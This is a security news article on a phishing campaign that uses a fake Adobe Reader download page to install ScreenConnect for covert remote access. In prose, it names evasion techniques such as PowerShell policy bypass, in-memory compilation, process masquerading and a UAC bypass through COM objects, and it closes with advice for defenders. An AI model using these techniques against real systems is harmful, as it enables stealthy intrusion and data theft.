Fake Adobe Reader lure turns remote tool rogue

Attackers are exploiting trust in Adobe’s brand to deliver covert remote access, using a fake Acrobat Reader download page to install ConnectWise ScreenConnect through a fileless, memory-heavy attack chain that is designed to leave few traces on disk and make forensic analysis harder. Security researchers who uncovered the campaign said the operation began with a phishing site made to resemble Adobe’s official software page, where victims were pushed into downloading what looked like a legitimate installer but was in fact a heavily obfuscated Visual Basic script.

The campaign stands out less for novelty than for execution. According to Zscaler ThreatLabz, the bogus installer launched PowerShell with execution policy bypass, created a temporary directory, pulled additional code from Google Drive, and then compiled C# code directly in memory using PowerShell’s Add-Type function. That meant the core payload could run without being written to disk in a conventional executable form. Researchers said the loader then used. NET reflection to invoke the next stage, a technique that sharply reduces opportunities for traditional file-based defences to catch the malware before it runs.

From there, the attackers layered on evasive measures more commonly associated with advanced intrusions. Zscaler said the loader manipulated Windows process metadata through the Process Environment Block, rewriting fields so the malicious process could masquerade as a legitimate Windows binary. The same research also described abuse of auto-elevated COM objects to obtain higher privileges without prompting the victim with the usual user account control warning. Together, those methods gave the operation stealth and reach, allowing the attackers to blend into normal system activity while increasing control over the compromised machine.

ScreenConnect itself is not malware. It is a widely used remote support and access product marketed by ConnectWise for enterprise and IT administration, with functions that include remote support, remote access and privileged access. ConnectWise presents it as a security-focused platform with encryption, authentication, audit logging and role-based controls. That legitimate pedigree is exactly why such tools are attractive to attackers: they can provide powerful access while appearing less suspicious to users and, in some cases, to security software. There is no indication in the available reporting that Adobe’s or ConnectWise’s own infrastructure was compromised in this case; the abuse lay in imitation and repurposing, not in a confirmed breach of either vendor.

That pattern has become more pronounced across the cyber threat landscape. Microsoft said last month that it had observed February 2026 phishing campaigns using trusted branding, signed malware and remote monitoring and management tools to establish persistence inside victim environments. ConnectWise, in its 2026 MSP threat report, also said attackers were shifting away from dependence on novel exploits and increasingly abusing trusted identities, legitimate system tools and remote access infrastructure. The fake Reader lure fits squarely within that trend, where the line between authorised administration software and unauthorised control is deliberately blurred.

Timing has added another layer of concern. Adobe issued a security bulletin on 14 April for Acrobat and Reader, covering critical and important vulnerabilities, although Adobe said it was not aware of in-the-wild exploitation for the issues addressed in that bulletin. Separate security reporting this week has focused on an actively exploited Acrobat and Reader zero-day, but the fake-download campaign documented by Zscaler is a distinct threat path: it relies on social engineering and a spoofed download portal rather than requiring exploitation of an Adobe software flaw on the victim machine. That distinction matters because it shows how attackers can profit from brand familiarity even when users believe they are taking a protective step by fetching a trusted application.

For defenders, the lesson is straightforward but demanding. Blocking suspicious download domains, monitoring PowerShell misuse, restricting script execution, and watching for unauthorised deployment of remote management tools are all necessary, but none is sufficient on its own. Security teams also need tighter controls around legitimate remote access products, because once such a tool is planted under hostile control, it can enable surveillance, lateral movement and data theft without the conspicuous behaviour often associated with commodity malware. Organisations that allow ScreenConnect or similar tools in their environments face a particular challenge: distinguishing authorised support activity from intrusions that hide behind familiar software names and standard administrative functions.